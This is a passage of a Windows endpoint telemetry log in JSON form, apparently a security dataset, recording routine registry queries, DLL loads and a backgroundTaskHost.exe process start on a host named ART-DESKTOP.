"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", - "registry_value": "HostActivityManager", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager\\Volatile", - "registry_value": "Volatile", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications\\41C64E6DA30CB855", - "registry_value": "41C64E6DA30CB855", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca", - "event_type": "process", - "logon_id": 217097, - "parent_process_name": "svchost.exe", - "parent_process_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 6376, - "ppid": 780, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "subtype": "create", - "timestamp": 131883571688960000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}", - "unique_ppid": "{42FC7E13-B293-5C05-0000-0010FAC80000}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689020000, - "unique_pid": 